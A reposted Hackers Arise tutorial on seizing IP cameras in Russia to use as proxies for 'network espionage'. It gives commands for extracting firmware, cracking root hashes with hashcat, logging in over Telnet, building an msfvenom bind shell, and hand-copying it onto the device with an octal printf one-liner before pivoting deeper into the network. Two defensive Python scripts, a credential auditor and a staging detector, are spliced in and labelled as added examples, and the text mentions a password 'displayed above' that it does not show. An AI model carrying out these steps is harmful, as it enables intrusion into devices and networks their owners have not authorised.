The post Network Espionage – Using Russian Cameras as Proxies, Part 2 first appeared on Hackers Arise.

Welcome back, cyberwarriors. We’re continuing the series on camera hacking. This time we’re going into reverse engineering to take over devices that can’t be accessed with basic attacks. As you’ve seen, SSH brute-forcing or logging into a web panel doesn’t always work. That’s when firmware reverse engineering comes in.

Case 3: Reverse Engineering
Let’s say you find a camera with no SSH option in the interface, but Telnet is open. That’s a common case.

In this case, we will need to find and download the camera’s firmware. There are different sites hosting firmware, but if you prefer, you can download it directly from the manufacturer. Keep in mind that different manufacturers use different file extensions for their firmware. For this camera we will need the .rootfs file.

Once you have it, install 7zip to extract the contents:
kali > sudo apt install p7zip-full
kali > 7z x firmware.rootfs

After unpacking, you’ll see standard Linux directories like /etc, /bin, and /home.

Head into /etc to look for hashed passwords. This is where most devices store their login data.

Once you find the hash, save it to a file. Use hashcat with a common wordlist like rockyou.txt to crack it:
kali > sudo hashcat -m 500 hash.txt /usr/share/wordlists/rockyou.txt
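A defender auditing the same unpacked root filesystem wants to know what the /etc files expose before anyone else does. The following Python script is an added example, not code from the Hackers Arise post: given the directory produced by 7z x, it parses /etc/passwd and /etc/shadow, names the hash scheme of every account (md5crypt, the $1$ scheme that hashcat mode 500 targets, is flagged as weak), and reports hashes left in the world-readable passwd file as well as accounts with an empty password field. The sample passwd and shadow contents are constructed for the demonstration and the hash values in them are placeholders, not real camera credentials.

```python
"""Audit an unpacked firmware root filesystem for weak credential storage.

Added example (not from the Hackers Arise post). Point it at the directory
produced by `7z x firmware.rootfs`; with no argument it audits a constructed
sample tree instead.
"""
import os
import re
import sys
import tempfile

# Hash scheme by prefix. md5crypt ($1$) is the scheme hashcat mode 500 cracks.
SCHEMES = {
    "$1$": "md5crypt (weak, hashcat -m 500)",
    "$5$": "sha256crypt",
    "$6$": "sha512crypt",
    "$y$": "yescrypt",
    "$2": "bcrypt",
}


def classify(field):
    """Describe a passwd/shadow password field."""
    if field == "":
        return "EMPTY (no password required)"
    if field in ("x", "*", "!", "!!") or field.startswith("!"):
        return "locked or stored elsewhere"
    for prefix, name in SCHEMES.items():
        if field.startswith(prefix):
            return name
    # Traditional DES crypt: 13 characters from the crypt alphabet, no prefix.
    if re.fullmatch(r"[./0-9A-Za-z]{13}", field):
        return "descrypt (weak, 8-char limit)"
    return "unknown"


def parse_passwd_like(path):
    """Yield (user, password_field) for each entry of a passwd/shadow file."""
    if not os.path.isfile(path):
        return
    with open(path, encoding="utf-8", errors="replace") as fh:
        for line in fh:
            line = line.rstrip("\n")
            if not line or line.startswith("#"):
                continue
            parts = line.split(":")
            if len(parts) >= 2:
                yield parts[0], parts[1]


def audit_rootfs(root):
    """Return a list of finding strings for an unpacked rootfs directory."""
    findings = []
    for rel in ("etc/passwd", "etc/shadow"):
        for user, field in parse_passwd_like(os.path.join(root, rel)):
            scheme = classify(field)
            if scheme == "locked or stored elsewhere":
                continue
            findings.append(f"{rel}: {user}: {scheme}")
            # A hash in /etc/passwd is readable by every local user and process.
            if rel == "etc/passwd" and field not in ("", "x"):
                findings.append(f"{rel}: {user}: hash in world-readable passwd file")
    return findings


def build_sample_rootfs():
    """Write a constructed /etc/passwd and /etc/shadow into a temp dir.

    The hash strings are placeholders made up for this example.
    """
    root = tempfile.mkdtemp()
    os.makedirs(os.path.join(root, "etc"))
    with open(os.path.join(root, "etc", "passwd"), "w") as fh:
        fh.write("root:$1$ExAmPlE$abcdefghijklmnopqrstuv:0:0:root:/root:/bin/sh\n")
        fh.write("admin::0:0:admin:/:/bin/sh\n")
        fh.write("daemon:x:1:1:daemon:/usr/sbin:/bin/false\n")
    with open(os.path.join(root, "etc", "shadow"), "w") as fh:
        fh.write("daemon:*:0:0:99999:7:::\n")
        fh.write("service:$6$saltsalt$" + "a" * 86 + ":0:0:99999:7:::\n")
    return root


if __name__ == "__main__":
    target = sys.argv[1] if len(sys.argv) > 1 else build_sample_rootfs()
    for finding in audit_rootfs(target):
        print(finding)
```

On the constructed tree the script reports the root md5crypt hash twice (weak scheme, and stored in passwd rather than shadow), the empty admin password, and the sha512crypt service hash; the locked daemon entries are skipped. For a vendor, every line of that output is a remediation item: move hashes to /etc/shadow, use a modern scheme, and never ship an account with an empty field.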

These devices often use weak default passwords. If you come across a no-name Chinese-made camera, you might try the password displayed above, as it’s commonly used by the Chinese manufacturers.
After cracking the hash, try logging in using Telnet:
kali > telnet

Use root as the username and the cracked password when prompted. Once you’re in, you’ve got a shell, but Telnet doesn’t support SSH-style dynamic tunneling. To make use of the access, you’ll want a bind shell running on the camera. If tools like curl or ncat aren’t available on the device, you’ll need to copy your payload in manually.
Start by generating your shell:
kali > msfvenom -p linux/armle/meterpreter/bind_tcp -f elf -o bind

Next use this one-liner to convert it into a scriptable format:
kali > cat bind | od -An -t o1 -v | tr ' ' '/' | while read line; do echo "printf '$line' >> out.bin" | tr '/' '\\'; done

Now copy the script output and paste it line-by-line on the camera to recreate the payload. Once it's on the device, give it execution permissions and run it:

target > chmod +x out.bin
target > ./out.bin
This will run your bind shell. Go back to your Kali machine, set up a multi/handler in Metasploit with the same payload and port used, then connect.
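From the defender's side, the transfer-by-printf trick and the bind shell that follows leave a recognisable trail in any command audit of the device (a forwarded shell history, a captured telnet session, or one syslog line per command; the log format used below is an assumption, not a real camera's). The following Python detector is an added example, not code from the post or from Metasploit: it flags a file that was assembled by repeated printf appends of octal escapes, notes when the first append carries the ELF magic bytes, and raises an alert when a later command on the same host makes that file executable or runs it. The log lines are constructed for the example.

```python
"""Detect payload staging via octal printf appends in a command audit log.

Added example (not from the Hackers Arise post). The log format
'<timestamp> <host> <proc>: <command>' is an assumption for the demo.
"""
import re
from collections import defaultdict

# printf '\NNN\NNN...' >> <file>  (octal escapes only, appended to a file)
OCTAL_PRINTF = re.compile(r"printf\s+'((?:\\[0-7]{1,3})+)'\s*>>\s*(\S+)")
# 0x7f 'E' 'L' 'F' written as the octal escapes od -t o1 produces
ELF_MAGIC_OCTAL = r"\177\105\114\106"

# Constructed sample log: two appends, chmod, execution, then a benign command.
SAMPLE_LOG = [
    r"2024-05-01T10:00:01 cam01 sh: printf '\177\105\114\106' >> out.bin",
    r"2024-05-01T10:00:02 cam01 sh: printf '\001\001\001\000' >> out.bin",
    r"2024-05-01T10:00:03 cam01 sh: chmod +x out.bin",
    r"2024-05-01T10:00:04 cam01 sh: ./out.bin",
    r"2024-05-01T10:00:05 cam01 sh: ls /etc",
]


def parse_line(line):
    """Split a '<timestamp> <host> <proc>: <command>' line into (ts, host, cmd)."""
    ts, host, rest = line.split(" ", 2)
    _, cmd = rest.split(": ", 1)
    return ts, host, cmd


def detect_staging(lines, min_writes=2):
    """Return alert strings for staged files that are later chmod'ed or run.

    A single printf append is common in shell scripts; min_writes requires the
    file to have been built up in several pieces before any alert fires.
    """
    writes = defaultdict(int)   # (host, file) -> number of octal printf appends
    elf_header = set()          # files whose first append is the ELF magic
    alerts = []
    for line in lines:
        ts, host, cmd = parse_line(line)
        m = OCTAL_PRINTF.search(cmd)
        if m:
            key = (host, m.group(2))
            if writes[key] == 0 and m.group(1).startswith(ELF_MAGIC_OCTAL):
                elf_header.add(key)
            writes[key] += 1
            continue
        # Any later command on the same host that names a staged file
        # (chmod +x, direct execution) is the alert trigger.
        for (h, path), count in writes.items():
            if h == host and count >= min_writes and path in cmd:
                kind = "ELF binary" if (h, path) in elf_header else "file"
                alerts.append(
                    f"{ts} {host}: {kind} {path} staged by {count} "
                    f"octal printf appends, then: {cmd}"
                )
    return alerts


if __name__ == "__main__":
    for alert in detect_staging(SAMPLE_LOG):
        print(alert)
```

On the sample log the detector raises two alerts, for the chmod and for the execution, and stays silent on the benign ls. Detection is the fallback, not the fix: a camera with Telnet disabled and its management VLAN filtered so that unexpected listening ports cannot be reached from the user network never reaches this stage.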

Once you’ve got a session, use proxychains with a SOCKS proxy like in Part 1 to move inside the network.
Conclusion
Some targets require more work than just logging in. Basic reverse engineering helps you break into devices that can’t be brute-forced or easily exploited. By extracting and analyzing firmware, cracking hashes, and building payloads manually, you can get control even without common tools or features like SSH. Once inside, cameras make a good pivot point. In the next part, we’ll get into firmware modification for persistence and backdoor deployment. See you there.
Source: HackersArise
Source Link: https://hackers-arise.com/network-espionage-using-russian-cameras-as-proxies-part-2/